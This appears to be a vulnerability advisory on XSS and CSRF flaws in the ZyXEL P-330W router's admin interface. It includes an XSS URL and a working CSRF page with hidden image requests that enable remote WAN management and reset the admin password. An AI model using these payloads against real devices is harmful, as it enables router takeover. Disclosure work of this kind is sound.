ZyXEL P-330W - Multiple Vulnerabilities



source: http://www.securityfocus.com/bid/27024/info


ZyXEL P-330W 802.11g Secure Wireless Internet Sharing Router is prone to multiple cross-site scripting vulnerabilities and cross-site request-forgery vulnerabilities because it fails to properly sanitize user-supplied input. These issues affect the device's web-based administrative interface.

An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

The attacker may leverage the cross-site request-forgery issues to perform actions in the context of a device administrator, which can compromise the device. 

http://www.example.com:<router_port>/ping.asp?pingstr=�><script>alert("M
erry Christams")</script>

The following cross-site request-forgery example was provided:

<html><head><title>Chirstmastime is Here</title></head><body>
<img
src="http://www.example.com:<router_port>/goform/formRmtMgt?webWanAccess
=ON&remoteMgtPort=80
80&pingWANEnabled=&upnpEnabled=&WANPassThru1=&WANPassThru2=&WANPassT
hru3=&
submit-url=%2Fremotemgt.asp" width="0" height="0">
<img
src="http://www.example.com:<router_port>/goform/formPasswordSetup?usern
ame=admin&newpass=santa_pw
&confpass=santa_pw&submit-url=%2Fstatus.asp&save=Save" width="0"
height="0">
</body>
</html>